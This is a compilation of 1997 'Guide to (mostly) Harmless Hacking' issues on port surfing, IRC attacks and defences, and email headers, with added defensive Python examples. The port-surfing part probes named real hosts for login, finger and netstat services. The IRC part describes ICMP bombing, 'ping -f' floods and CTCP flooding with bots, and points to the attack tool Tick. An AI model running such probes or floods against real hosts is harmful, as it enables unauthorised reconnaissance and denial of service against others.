tr-rsrb-p2      1988/tcp   cisco RSRB Priority 2 port
tr-rsrb-p3      1989/tcp   cisco RSRB Priority 3 port
stun-p1         1990/tcp   cisco STUN Priority 1 port
stun-p2         1991/tcp   cisco STUN Priority 2 port
stun-p3         1992/tcp   cisco STUN Priority 3 port
snmp-tcp-port   1993/tcp   cisco SNMP TCP port
stun-port       1994/tcp   cisco serial tunnel port
perf-port       1995/tcp   cisco perf port
tr-rsrb-port    1996/tcp   cisco Remote SRB port
gdp-port        1997/tcp   cisco Gateway Discovery Protocol
x25-svc-port    1998/tcp   cisco X.25 service (XOT)
tcp-id-port     1999/tcp   cisco identification port
************************

But what about the “normal” telnet port, which is 23? Since it is the “normal” port, the one you usually go to when you want to log in, we don’t need to put the 23 after the host name:

->telnet 146.230.128.8
Trying 146.230.128.8 ...
Connected to 146.230.128.8.
Escape character is '^]'.
C
*************************************************************************
***  Welcome to the University of Natal                               ***
***                                                                   ***
*** Model : Cisco 4500 with ATM and 8 BRI ports                       ***
***                                                                   ***
*** Dimension Data Durban - 031-838333                                ***
***                                                                   ***
*************************************************************************

User Access Verification

Password:

Hey, this is interesting, no username requested, just a password. If I were the sysadmin, I’d make it a little harder to log in. Hmmm, what happens if I try to port surf finger that site? That means telnet to the finger port, which is 79:

->telnet 146.230.128.8 79
Trying 146.230.128.8 ...
Connected to 146.230.128.8.
Escape character is '^]'.
C
*************************************************************************
***  Welcome to the University of Natal                               ***
***                                                                   ***
*** Model : Cisco 4500 with ATM and 8 BRI ports                       ***
***                                                                   ***
*** Dimension Data Durban - 031-838333                                ***
***                                                                   ***
*************************************************************************
    Line     User      Host(s)               Idle Location
*  2 vty 0             idle                     0 kitsune.swcp.com
  BR0:2                Sync PPP             00:00:00
  BR0:1                Sync PPP             00:00:00
  BR1:2                Sync PPP             00:00:00
  BR1:1                Sync PPP             00:00:00
  BR2:2                Sync PPP             00:00:01
  BR2:1                Sync PPP             00:00:00
  BR5:1                Sync PPP             00:00:00
Connection closed by foreign host.

Notice that finger lists the connection to the computer I was port surfing from: kitsune. But no one else seems to be on line just now. Please remember, when you port surf, unless you know how to do IP spoofing, your target computer knows where you came from. Of course I will be a polite guest.
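Seen from the router’s side, that table is the list of its active lines, and the point about the target knowing where you came from cuts both ways: an administrator can watch the same table for logins from outside the campus. This added Python example (not the guide’s code) parses a constructed copy of the table above, keeps only the virtual terminal (vty) sessions, which are the remote logins, and flags any whose source host is not under a trusted domain suffix. The jsmith row and the trusted suffix .und.ac.za are assumptions for illustration.

```python
# Constructed sample modelled on the router's line table above; the jsmith row is invented.
SAMPLE_LINE_TABLE = """\
    Line     User      Host(s)               Idle Location
*  2 vty 0             idle                     0 kitsune.swcp.com
   3 vty 1   jsmith    idle                 00:02 eagle.und.ac.za
  BR0:2                Sync PPP             00:00:00
  BR5:1                Sync PPP             00:00:00
"""

def parse_vty_sessions(text):
    """Return the vty (remote login) sessions; Sync PPP lines on the BRI ports carry no
    remote location and are skipped. The asterisk marks the line this very query came in on."""
    sessions = []
    for raw in text.splitlines():
        tokens = raw.split()
        if "vty" not in tokens:
            continue
        current = tokens[0] == "*"
        if current:
            tokens = tokens[1:]
        vty_at = tokens.index("vty")
        after_line = len(tokens) - (vty_at + 2)       # tokens left after "vty N"
        sessions.append({
            "line": "vty " + tokens[vty_at + 1],
            "user": tokens[vty_at + 2] if after_line > 3 else "",   # user column is blank when not logged in
            "idle": tokens[-2],
            "location": tokens[-1],
            "current": current,
        })
    return sessions

def untrusted_sessions(sessions, trusted_suffixes):
    """Sessions whose source host is not under any of the trusted domain suffixes."""
    def trusted(location):
        location = location.lower()
        return any(location == s.lower().lstrip(".") or location.endswith(s.lower())
                   for s in trusted_suffixes)
    return [s for s in sessions if not trusted(s["location"])]

if __name__ == "__main__":
    for s in untrusted_sessions(parse_vty_sessions(SAMPLE_LINE_TABLE), [".und.ac.za"]):
        print("session from outside the campus:", s["line"], s["location"])
```

Run on the sample it reports the vty 0 session from kitsune.swcp.com, which is the very connection the paragraph above describes.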

Now let’s try the obvious. Let’s telnet to the login port of daisy. I use the numerical address just for the heck of it:

->telnet 146.230.192.18
Trying 146.230.192.18 ...
Connected to 146.230.192.18.
Escape character is '^]'.

NetBSD/i386 (daisy.ee.und.ac.za) (ttyp0)

login:

Hey, this is interesting. Since we now know this is a university, that’s probably the electrical engineering (EE) department. And NetBSD is a freeware Unix that runs on a PC! Probably a 80386 box.

Getting this info makes me almost feel like I’ve been hanging out at the University of Natal EE computer lab. It sounds like a friendly place. Judging from their router, security is somewhat lax, they use cheap computers, and messages are friendly. Let’s finger and see who’s logged in just now:

Since I am already in the telnet program (I can tell by the prompt “telnet>”), I go to daisy using the “open” command:

telnet> open daisy.ee.und.ac.za 79
Trying 146.230.192.18 ...
telnet: connect: Connection refused
telnet> quit

Well, that didn’t work, so I exit telnet and try the finger program on my shell account computer:

->finger @daisy.ee.und.ac.za
[daisy.ee.und.ac.za]
finger: daisy.ee.und.ac.za: Connection refused

Sigh. It’s hard to find open finger ports any more. But it’s a good security practice to close finger. Damien Sorder points out, “If you install the new Linux distributions, it comes with Cfingerd. Why would I (and others) want to shut it down? Not because of hackers and abuse or some STUPID S*** like that. Because it gives out way too much information when you finger a single user. You get machine load and all the user information.”

I manage to pull up a little more info on how to map the interconnections of University of Natal computers with a search of the Web using http://digital.altavista.com. It links me to the site http://www.frd.ac.za/uninet/sprint.html, which is titled “Traffic on the UNINET-SPRINTLINK Link.” However, all the links to network traffic statistics from that site are dead.

Next, let’s look into number 20 on that traceroute that led us to the University of Natal. You can pretty much expect that links in the middle of a long traceroute will be big computers owned by the bigger companies that form the backbone of the Internet.

->telnet 155.232.82.2 2001
Trying 155.232.82.2 ...
Connected to 155.232.82.2.
Escape character is '^]'.

                              Id: und02
                        Authorised Users Only!
                       ------------------------
 

User Access Verification

Username:

Yup, we’re out of friendly territory now. And since port 2001 works, it may be a router. Just for laughs, though, let’s go back to the default telnet port:

->telnet 155.232.82.2
Trying 155.232.82.2 ...
Connected to 155.232.82.2.
Escape character is '^]'.

                              Id: und02
                        Authorised Users Only!
                       ------------------------
 

User Access Verification

Username:

Now just maybe this backbone-type computer will tell us gobs of stuff about all the computers it is connected to.  We try telneting to the netstat port, 15. This, if it happens to be open to the public, will tell us all about the computers that connect through it:

->telnet 155.232.82.2 15
Trying 155.232.82.2 ...
telnet: connect: Connection refused

Sigh. I gave an example of the incredible wealth of information you can get from netstat on the GTMHH on port surfing. But every day it is harder to find a public netstat port. That’s because the information netstat gives is so useful to computer criminals. In fact, port 15 is no longer reserved as the netstat port (as of 1994, according to the RFC). So you will find few boxes using it.

******************************
Newbie note: want to know what port assignments your ISP uses? Sorder points out “ /etc/services on most machines will [tell you this].”

How can you read that information? Try this:

First, change to the /etc/ directory:

->cd /etc

Then command it to print it out to your screen with:

->more services
#
# @(#)services 1.16 90/01/03 SMI
#
# Network services, Internet style
# This file is never consulted when the NIS are running
#
tcpmux          1/tcp                           # rfc-1078
echo            7/tcp

... and so on...

Alas, just because your shell account has a list of port assignments doesn’t mean they are actually in use. It also probably won’t list specialized services like all those Cisco router port assignments.
*************************
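Both the Cisco port table in the Evil Genius tip above and /etc/services use the same idea: a name, a port/protocol pair and a description. This added Python example (not from the guide) parses the /etc/services format, looks ports up in either direction, and sorts a list of listening ports on your own box into “known service” and “not in the table,” which is the inventory question an administrator asks before a stranger asks it for them. The sample is a constructed excerpt in /etc/services form; the page’s RFC-style Cisco listing puts the description where /etc/services has aliases, so the Cisco entries here carry it as a # comment instead. The listener list is constructed too.

```python
# Constructed excerpt in /etc/services format (the Cisco entries are taken from the tip above).
SAMPLE_SERVICES = """\
#
# Network services, Internet style
#
tcpmux          1/tcp                           # rfc-1078
echo            7/tcp
echo            7/udp
netstat         15/tcp
telnet          23/tcp
domain          53/tcp          nameserver      # name-domain server
domain          53/udp          nameserver
finger          79/tcp
cisco-fna       130/tcp                         # cisco FNATIVE
gdp-port        1997/tcp                        # cisco Gateway Discovery Protocol
tcp-id-port     1999/tcp                        # cisco identification port
ircd            6667/tcp                        # Internet Relay Chat
"""

def parse_services(text):
    """(port, proto) -> {name, aliases, comment}; comment lines and malformed lines are skipped."""
    table = {}
    for raw in text.splitlines():
        line, _, comment = raw.partition("#")
        fields = line.split()
        if len(fields) < 2 or "/" not in fields[1]:
            continue
        port, proto = fields[1].split("/", 1)
        table[(int(port), proto)] = {"name": fields[0], "aliases": fields[2:], "comment": comment.strip()}
    return table

def service_name(table, port, proto="tcp"):
    """Official name for a port, or None when the table does not list it."""
    entry = table.get((port, proto))
    return entry["name"] if entry else None

def ports_for(table, name):
    """Ports registered under a name or one of its aliases."""
    return sorted({port for (port, _), e in table.items() if name in (e["name"], *e["aliases"])})

def classify_listeners(table, listeners):
    """Split a list of (port, proto) you found listening into known services and unlisted ports."""
    known, unknown = {}, []
    for port, proto in listeners:
        name = service_name(table, port, proto)
        if name:
            known[(port, proto)] = name
        else:
            unknown.append((port, proto))
    return known, unknown

if __name__ == "__main__":
    table = parse_services(SAMPLE_SERVICES)
    # Constructed listener list; on a real box take it from netstat or ss output.
    print(classify_listeners(table, [(23, "tcp"), (79, "tcp"), (2001, "tcp")]))
```

Note that port 2001, the router administrative port used earlier, lands in the “unknown” list: exactly the gap the note above warns about, since /etc/services does not carry vendor-specific assignments.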

In fact, after surfing about two dozen somewhat randomly chosen netstat ports, the only answer I get other than “Connection refused” is:

->telnet ns.nmia.com 15
Trying 198.59.166.10 ...
Connected to ns.nmia.com.
Escape character is '^]'.
Yes, but will I see the EASTER BUNNY in skintight leather
 at an IRON MAIDEN concert?

Now what about all those Sprintlink routers in that traceroute? That’s a major Internet backbone based in the US provided by Sprint. You can get some information on the topology of the Sprintlink backbone at http://www.sprintlink.net/SPLK/HB21.html#2.2. Alas, Sprintlink used to give out much more information than they do today. All I can pick up on their Web site today is pretty vague.

Sigh. The Internet is getting less friendly, but more secure. Some day when we’re really ancient, say five years from now, we’ll be telling people, “Why, I remember when we could port surf! Why, there used to be zillions of open ports and people could choose ANY password they wanted. Hmph! Today it’s just firewalls everywhere you look!” Adds Sorder, “Gee. How do you think people like me feel.. port surfing over 6 years ago.”

Our thanks to Damien Sorder (jericho@dimensional.com) for assistance in reviewing and contributing to this GTMHH.
_________________________________________________________
Subscribe to our email list by emailing to hacker@techbroker.com with message "subscribe" or join our Hacker forum at http://www.infowar.com/cgi-shl/login.exe.
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com.  To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Please direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1997 Carolyn P. Meinel. You may forward or post on your Web site this GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.
________________________________________________________
 

___________________________________________________________

GUIDE TO (mostly) HARMLESS HACKING

Vol. 3 Number 3

How to keep from getting kicked off IRC!
____________________________________________________________

Our thanks to Patrick Rutledge, Warbeast, Meltdown and k1neTiK, who all provided invaluable information on the burning question of the IRC world: help, they’re nuking meee...

What’s the big deal about IRC and hackers? Sheesh, IRC is sooo easy to use... until you get on a server where hacker wars reign. What the heck do you do to keep from getting clobbered over and over again?

Of course you could just decide your enemies can go to heck. But let’s say you’d rather hang in there. You may want to hang in there because if you want to make friends quickly in the hacker world, one of the best ways is over Internet Relay Chat (IRC).

On IRC a group of people type messages back and forth on a screen in almost real time. It can be more fun than Usenet where it can take from minutes to hours for people’s replies to turn up. And unlike Usenet, if you say something you regret, it’s soon gone from the screen. Ahem. That is, it will soon be gone if no one is logging the session.

In some ways IRC is like CB radio, with lots of folks flaming and making fools of themselves in unique and irritating ways. So don’t expect to see timeless wisdom and wit scrolling down your computer screen. But because IRC is such an inexpensive way for people from all over the world to quickly exchange ideas, it is widely used by hackers. Also, given the wars you can fight for control of IRC channels, it can give you a good hacker workout.

To get on IRC you need both an IRC client program and you need to connect to a Web site or Internet Service Provider (ISP) that is running an IRC server program.

***********************
Newbie note: Any program that uses a resource is called a “client.”  Any program that offers a resource is a “server.”  Your IRC client program runs on either your home computer or shell account computer and connects you to an IRC server program which runs on a remote computer somewhere on the Internet.
***********************

You may already have an IRC server running on your ISP. Customer service at your ISP should be able to help you with instructions on how to use it. Even easier yet, if your Web browser is set up to use Java, you can run IRC straight from your browser once you have surfed into a Web-based IRC server.

Where are good IRC servers for meeting other hackers?

There are several IRC servers that usually offer hacker channels. EFNet (Eris-Free Network) links many IRC servers. It was originally started by the Eris FreeNet (ef.net). It is reputed to be a “war ground” where you might get a chance to really practice the IRC techniques we cover below.

Undernet is one of the largest networks of IRC servers. The main purpose of Undernet is to be a friendly place with IRC wars under control. But this means, yes, lots of IRC cops! The operators of these IRC servers have permission to kill you not only from a channel but also from a server. Heck, they can ban you for good. They can even ban your whole domain.

************************************
Newbie note: A domain is the last two (or sometimes three or four) parts of your email address. For example, aol.com is the domain name for America Online. If an IRC network were to ban the aol.com domain, that would mean every single person on America Online would be banned from it.
************************************

************************************
You can get punched in the nose warning: If the sysadmins at your ISP were to find out that you had managed to get their entire domain banned from an IRC net on account of committing ICMP bombing or whatever, they will be truly mad at you! You will be lucky if the worst that happens is that you lose your account. You’d better hope that word doesn’t get out to all the IRC addicts on your ISP that you were the dude that got you guys all kicked out.
************************************

 IRCNet is probably the same size as Undernet, if not larger. IRCNet is basically the European/Australian half of the old EFNet, which split off to form its own network.

 Yes, IRC is a world-wide phenomenon. Get on the right IRC network and you can be making friends with hackers on any continent of the planet. There are at least 80 IRC networks in existence. To learn how to contact them, surf over to: http://www.irchelp.org/. You can locate additional IRC servers by surfing over to http://hotbot.com or http://altavista.digital.com and searching for “IRC server.”  Some IRC servers are ideal for the elite hacker, for example the l0pht server. Note that it is a “zero,” not an “O,” in l0pht.

****************************************
Evil genius tip: Get on an IRC server by telneting straight in to port 6667 at the domain name for that server. There is no client to do the talking for you, so you type the protocol yourself: a NICK command and a USER command to register, then JOIN for a channel, and a PONG reply each time the server sends you a PING or it will drop you.
****************************************

 But before you get too excited over trying out IRC, let us warn you. IRC is not so much phun any more because some d00dz aren’t satisfied with using it to merely say naughty words and cast aspersions on people’s ancestry and grooming habits. They get their laughs by kicking other people off IRC entirely. This is because they are too chicken to start brawls in bars. So they beat up on people in cyberspace where they don’t have to fret over getting ouchies.

 But we’re going to show some simple, effective ways to keep these lusers from ruining your IRC sessions. However, first you’ll need to know some of the ways you can get kicked off IRC by these bullies.

 The simplest way to get in trouble is to accidentally give control of your IRC channel to an impostor whose goal is to kick you and your friends off.

 You see, the first person to start up a channel on an IRC server is automatically the operator (OP). The operator has the power to kick people off or invite people in. Also, if the operator wants to, he or she may pass operator status on to someone else.

 Ideally, when you leave the channel you would pass this status on to a friend you trust. Or maybe someone who you think is your good buddy is begging you to please, please give him a turn being the operator. You may decide to hand over the OP to him or her in order to demonstrate friendship. But if you mess up and accidentally OP a bad guy who is pretending to be someone you know and trust, your fun chat can become history.

 One way to keep all this obnoxious stuff from happening is to simply not OP people you do not know. But this is easier said than done. It is a friendly thing to give OP to your buddies. You may not want to appear stuck up by refusing to OP anyone. So if you are going to OP a friend, how can you really tell that IRC dude is your friend?

 Just because you recognize the nick (nickname), don’t assume it’s who you think it is! Check the host address associated with the nick by giving the command "/whois IRCnick" where “IRCnick” is the nickname of the person you want to check.

 This “/whois” command gives you back the user@host identity the server recorded when that nick signed on, which usually looks like the person’s email address. If you see, for example, “d***@wannabe.net” instead of the address you expected, say friend@cool.com, then DO NOT OP him.  Make the person explain who he or she is and why the address is different.

 But entering a fake nick when entering an IRC server is only the simplest of ways someone can sabotage an IRC session. Your real trouble comes when people deploy “nukes” and “ICBMs” against you.

 “Nuking” is also known as “ICMP bombing.” The attacker sends forged packets that make your computer or your IRC client believe something has gone wrong with its connection: an EOF (end of file), a dead socket, a redirect, and so on.

**************************************
Newbie note: ICMP stands for Internet Control Message Protocol. ICMP attacks are a class of IRC attacks that go beyond exploiting quirks in the IRC server program; they use major league hacking techniques based upon the way the Internet itself works.
**************************************
**************************************
You can go to jail warning: ICMP attacks constitute illegal denial of service attacks. They are not just harmless harassment of a single person on IRC, but may affect an entire Internet host computer, disrupting service to all who are using it.
***************************************

 For example, ICMP redirect messages are used by routers to tell other computers “Hey, quit sending me that stuff. Send it to routerx.foobar.net instead!” So an ICMP redirect message could cause your IRC messages to go to bit heaven instead of your chat channel.

 EOF stands for “end of file.” “Dead socket” refers to connections such as your PPP session that you would be using with many IRC clients to connect to the Internet. If your IRC enemy spoofs a message that your socket is dead, your IRC chat session can’t get any more input from you.  That’s what the program “ICMP Host Unreachable Bomber for Windows” does.

 Probably the most devastating IRC weapon is the flood ping, known as “ICBM flood” or “ICMPing.” The idea is that a bully will find out what Internet host you are using, and then give the command “ping -f” against your host computer. Or even against your home computer. Yes, on IRC it is possible to identify the dynamically assigned IP address of your home computer (the host name /whois shows for you resolves to it) and send stuff directly to your modem! If the bully has a decent computer and connection, he or she may be able to ping yours badly enough to briefly knock you out of IRC. Then this character can take over your IRC session and may masquerade as you.

**********************
Newbie note: When you connect to the Internet with a point-to-point (PPP) connection, your ISP’s host computer assigns you an Internet Protocol (IP) address which may be different every time you log on. This is called a “dynamically assigned IP address.” In some cases, however, the ISP has arranged to assign the user the same IP address each time.
**********************

 Now let’s consider in more detail the various types of  flooding attacks on IRC.

 The purpose of flooding is to send so much garbage to a client that its connection to the IRC server either becomes useless or gets cut off.

 Text flooding is the simplest attack. For example, you could just hold down the “x” key and hit enter from time to time. This would keep the IRC screen filled with your junk and scroll the others’ comments quickly off the screen. However, text flooding is almost always unsuccessful because almost any IRC client (the program you run on your computer) has text flood control. Even if it doesn’t, text must pass through an IRC server. Most IRC servers also have text flood filters.

 Because text flooding is basically harmless, you are unlikely to suffer anything worse than getting banned or possibly K:lined for doing it.

******************************************
Newbie note: A “K:line” is a ban written into an IRC server’s configuration file. It matches a user@host pattern, and the pattern can be as wide as the server operators like. If it covers your whole domain, then not just you but anyone who is in your domain is banned from that IRC server. For example, if you are a student at Giant State University with an email address of IRCd00d@giantstate.edu, then every person whose email address ends with “giantstate.edu” will also be banned.
*******************************************

 Client to Client Protocol (CTCP) echo flooding is the most effective type of flood. This is sort of like the ping you send to determine whether a host computer is alive. It is a command used within IRC to check to see if someone is still on your IRC channel.

 How does the echo command work? To check whether someone is still on your IRC channel, give the command “/ctcp nick ECHO hello out there!” If “nick” (where “nick” is the IRC nickname of the person you are checking out) is still there, you get back “nick HELLO OUT THERE.”

 What has happened is that your victim’s IRC client program has automatically echoed whatever message you sent.

 But someone who wants to boot you off IRC can use the CTCP echo command to trick your IRC server into thinking you are hogging the channel with too much talking. This is because most IRC servers will automatically cut you off if you try text flooding.

 So CTCP echo flooding spoofs the IRC into falsely cutting someone off by causing the victim’s IRC client to automatically keep on responding to a whole bunch of echo requests.

 Of course your attacker could also get booted off for making all those CTCP echo requests.  But a knowledgeable attacker will either be working in league with some friends who will be doing the same thing to you or else be connected with several different nicks to that same IRC server. So by having different versions of him or herself in the form of software bots making those CTCP echo requests, the attacker stays on while the victim gets booted off.

 This attack is also fairly harmless, so people who get caught doing this will only get banned or maybe K:lined for their misbehavior.

******************************
Newbie note: A “bot” is a computer program that acts kind of like a robot to go around and do things for you. Some bots are hard to tell from real people. For example, some IRC bots wait for someone to use bad language and respond to these naughty words in annoying ways.
*************************************

*************************************
You can get punched in the nose warning:  Bots are not permitted on the servers of the large networks. The IRC Cops who control hacker wars on these networks love nothing more than killing bots and banning the botrunners that they catch.
**************************************

 A similar attack is the CTCP ping flood. You can give the command “/ping nick” and the IRC client of the guy using that nick responds, by way of the IRC server, with a message saying “nick” is alive and telling you how long it took for nick’s IRC client program to respond. It’s useful to know the response time because sometimes the Internet can be so slow it might take ten seconds or more to send an IRC message to other people on that IRC channel. So if someone seems to be taking a long time to reply to you, it may just be a slow Internet.

 Your attacker can also easily get the dynamically assigned IP (Internet protocol) address of your home computer and directly flood your modem. But just about every Unix IRC program has at least some CTCP flood protection in it. Again, we are looking at a fairly harmless kind of attack.

 So how do you handle IRC attacks? There are several programs that you can run with your Unix IRC program. Examples are the programs LiCe and Phoenix.  These scripts will run in the background of your Unix IRC session and will automatically kick in some sort of protection (ignore, ban, kick) against attackers.
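Here is what the two defensive habits above look like in code: check the /whois answer before giving OPs, and refuse to keep answering a CTCP flood. This is an added example written for this edit, not code from the Guide or from LiCe, Phoenix or any other script the Guide names. The nicks, hosts, thresholds and server lines are made up for illustration; the line format follows RFC 1459.

```python
"""Added example: minimal IRC line handling with two of the defenses the
Guide describes, a /whois identity check before giving OPs and a rate
limiter for CTCP PING/ECHO requests. Nicks, hosts, thresholds and the
server lines in the demo are made up for illustration."""
import fnmatch
import time
from collections import defaultdict, deque

CTCP_DELIM = "\x01"   # CTCP requests travel inside PRIVMSG text wrapped in \x01


def parse_irc_line(line):
    """Split a raw IRC line into (prefix, COMMAND, params), RFC 1459 style:
    [':' prefix ' '] command {' ' param} [' :' trailing]."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    if " :" in line:
        head, _, trailing = line.partition(" :")
        params = head.split() + [trailing]
    else:
        params = line.split()
    if not params:
        return prefix, "", []
    return prefix, params[0].upper(), params[1:]


def whois_identity(line):
    """From an RPL_WHOISUSER (numeric 311) reply return (nick, 'user@host'),
    or None for any other line."""
    _, command, params = parse_irc_line(line)
    if command != "311" or len(params) < 4:
        return None
    _me, nick, user, host = params[:4]
    return nick, "%s@%s" % (user, host)


def safe_to_op(whois_reply, nick, expected_mask):
    """True only if the server's /whois answer for nick matches the user@host
    mask we know for that friend. Masks take shell wildcards, e.g.
    '*@*.cool.com' for a friend whose dial-up host name changes."""
    ident = whois_identity(whois_reply)
    if ident is None or ident[0].lower() != nick.lower():
        return False
    return fnmatch.fnmatchcase(ident[1].lower(), expected_mask.lower())


class CtcpGuard:
    """Answer CTCP PING/ECHO, but go silent on anyone who sends more than
    max_per_sender requests in `window` seconds (they get ignored outright)
    and on everyone when the total rate across all nicks passes max_total,
    which is what an attacker driving several bots looks like."""

    def __init__(self, max_per_sender=3, max_total=8, window=10.0):
        self.max_per_sender = max_per_sender
        self.max_total = max_total
        self.window = window
        self.per_sender = defaultdict(deque)   # nick -> recent request times
        self.total = deque()                   # recent request times, all nicks
        self.ignored = set()

    def _prune(self, stamps, now):
        while stamps and now - stamps[0] > self.window:
            stamps.popleft()

    def handle(self, line, now=None):
        """Return the raw line we would send back, or None to stay quiet."""
        now = time.time() if now is None else now
        prefix, command, params = parse_irc_line(line)
        if command == "PING":                      # server keepalive: always answer
            return "PONG :" + (params[-1] if params else "")
        if command != "PRIVMSG" or len(params) < 2:
            return None
        text = params[1]
        if not (text.startswith(CTCP_DELIM) and text.endswith(CTCP_DELIM)):
            return None                            # plain chat never triggers an auto-reply
        sender = (prefix or "").split("!")[0]
        if sender in self.ignored:
            return None
        stamps = self.per_sender[sender]
        stamps.append(now)
        self._prune(stamps, now)
        self.total.append(now)
        self._prune(self.total, now)
        if len(stamps) > self.max_per_sender:
            self.ignored.add(sender)               # a flooder: never answer again
            return None
        if len(self.total) > self.max_total:
            return None                            # flood from many nicks: answer nobody
        ctcp_cmd, _, arg = text.strip(CTCP_DELIM).partition(" ")
        if ctcp_cmd.upper() not in ("PING", "ECHO"):
            return None
        payload = ctcp_cmd.upper() + (" " + arg if arg else "")
        return "NOTICE %s :%s%s%s" % (sender, CTCP_DELIM, payload, CTCP_DELIM)


if __name__ == "__main__":
    guard = CtcpGuard(max_per_sender=3)
    flood = ":evil!d00d@wannabe.net PRIVMSG me :\x01PING 42\x01"
    for t in range(5):                               # five requests in five seconds
        print(t, guard.handle(flood, now=float(t)))  # answers three, then goes quiet
```

The per-sender limit is what most war scripts implement; the second, total limit is there because, as the text says, a careful attacker spreads the requests over several nicks or bots so that no single one trips the per-sender check.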

 If you are running a Windows-based IRC client, you may assume that like usual you are out of luck. In fact, when I first got on an IRC channel recently using Netscape 3.01 running on Win 95, the *first* thing the denizens of #hackers did was make fun of my operating system. Yeah, thanks. But in fact there are great IRC war programs for both Windows 95 and Unix.

 For Windows 95 you may wish to use the mIRC client program. You can download it from http://www.super-highway.net/users/govil/mirc40.html. It includes protection from ICMP ping flood. But this program isn’t enough to handle all the IRC wars you may encounter. So you may wish to add the protection of  the most user-friendly, powerful Windows 95 war script around: 7th Sphere. You can get it from http://www.localnet.com/~marcraz/.

  If you surf IRC from a Unix box, you’ll want to try out IRCII. You can download it from ftp.undernet.org , in the directory /pub/irc/clients/unix, or http://www.irchelp.org/, or ftp://cs-ftp.bu.edu/irc/. For added protection, you may download LiCe from ftp://ftp.cibola.net/pub/irc/scripts. Ahem, at this same site you can also download the attack program Tick from /pub/irc/tick. But if you get Tick, just remember our “You can get punched in the nose” warning!

*********************************
Newbie note: For detailed instructions on how to run these IRC programs, see http://www.irchelp.org/, or go to Usenet and check out alt.irc.questions.
*********************************

*********************************
Evil genius tip: Want to know every excruciating technical detail about IRC? Check out RFC 1459 (The IRC protocol). You can find many copies of this ever popular RFC (Request for Comments) by doing a Web search.
********************************

 Now let’s suppose you are all set up with an industrial strength IRC client program and war scripts. Does this mean you are ready to go to war on IRC?

 Us Happy Hacker folks don’t recommend attacking people who take over OP status by force on IRC.  Even if the other guys start it, remember this. If they were able to sneak into the channel and get OPs just like that, then chances are they are much more experienced and dangerous than you are.  Until you become an IRC master yourself, we suggest you do no more than ask politely for OPs back.

 Better yet, "/ignore nick" the l00zer and join another channel.  For instance, if #evilhaxorchat is taken over, just create #evilhaxorchat2 and "/invite IRCfriend" all your friends there. And remember to use what you learned in this Guide about the IRC whois command so that you DON’T OP people unless you know who they are.

 As Patrick Rutledge says, this might sound like a wimp move, but if you don't have a fighting chance, don't try - it might be more embarrassing for you in the long run. And if you start IRC warrioring and get K:lined off the system, just think about that purple nose and black eye you could get when all the other IRC dudes at your ISP or school find out who was the luser who got everyone banned.

 That’s it for now. Now don’t try any funny stuff, OK? Oh, no, they’re nuking meee...

____________________________________________________________

Subscribe to our discussion list by emailing to hacker@techbroker.com with message "subscribe"
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com.  To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
________________________________________________________
 

___________________________________________________________

GUIDE TO (mostly) HARMLESS HACKING

Vol 3 Number 4

How to Read Email Headers and Find Internet Hosts
Warning: flamebait enclosed!
____________________________________________________________

OK, OK, you 31337 haxors win. I’m finally releasing the next in our series of Guides oriented toward the intermediate hacker.

Now some of you may think that headers are too simple or boring to waste time on. However, a few weeks ago I asked the 3000+ readers of the Happy Hacker list if anyone could tell me exactly what email tricks I was playing in the process of mailing out the Digests. But not one person replied with a complete answer -- or even 75% of the answer -- or even suspected that for months almost all Happy Hacker mailings have doubled as protests. The targets: ISPs offering download sites for email bomber programs. Conclusion: it is time to talk headers!

In this Guide we will learn:
· what is a header
· why headers are fun
· how to see full headers
· what all that stuff in your headers means
· how to get the names of Internet host computers from your headers
· the foundation for understanding the forging of email and Usenet posts, catching the people who forge headers, and the theory behind those email bomber programs that can bring an entire Internet Service Provider (ISP) to its knees

This is a Guide you can make at least some use of without getting a shell account or installing some form of Unix on your home computer. All you need is to be able to send and receive email, and you are in business. However, if you do have a shell account, you can do much more with deciphering headers. Viva Unix!

Headers may sound like a boring topic. Heck, the Eudora email program named the button you click to read full headers “blah blah blah.” But all those guys who tell you headers are boring are either ignorant -- or else afraid you’ll open a wonderful chest full of hacker insights. Yes, every email header you check out has the potential to unearth a treasure hidden in some back alley of the Internet.

Now headers may seem simple enough to be a topic for one of our Beginners’ Series Guides. But when I went to look up the topic of headers in my library of manuals, I was shocked to find that most of them don’t even cover the topic. The two I found that did cover headers said almost nothing about them. Even the relevant RFC 822 is pretty vague. If any of you super-vigilant readers looking for flame bait happen to know of any literature that *does* cover headers in detail, please include that information in your tirades!

*********************************************
Technical tip: Information relevant to headers may be extracted from Requests for Comments (RFCs) 822 (best), as well as 1042, 1123, 1521 and 1891 (not a complete list). To read them, take your Web browser to http://altavista.digital.com and search for “RFC 822” etc.
*********************************************

Lacking much help from manuals, and finding that RFC 822 didn’t answer all my questions, the main way I researched this article was to send email back and forth among some of my accounts, trying out many variations in order to see what kinds of headers they generated. Hey, that’s how real hackers are supposed to figure out stuff when RTFM (read the fine manual) or RTFRFC (read the fine RFC) doesn’t tell us as much as we want to know. Right?

One last thing. People have pointed out to me that every time I put an email address or domain name in a Guide to (mostly) Harmless Hacking, a zillion newbies launch botched hacking attacks against these. All email addresses and domain names below have been fubarred.

************************************************
Newbie note: The verb “to fubar” means to obscure email addresses and Internet host addresses by changing them. Ancient tradition holds that it is best to do so by substituting “foobar” or “fubar” for part of the address.
************************************************

WHAT ARE HEADERS?

If you are new to hacking, the headers you are used to seeing may be incomplete. Chances are that when you get email it looks something like this:

From: Vegbar Fubar <fooha@ifi.foobar.no>
Date: Fri, 11 Apr 1997 18:09:53 GMT
To: hacker@techbroker.com

But if you know the right command, suddenly, with this same email message, we are looking at tons and tons of stuff:

Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)
 for techbr@fooway.net id OAA07210; Fri, 11 Apr 1997 14:10:06 -0400
Received: from ifi.foobar.no by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI)
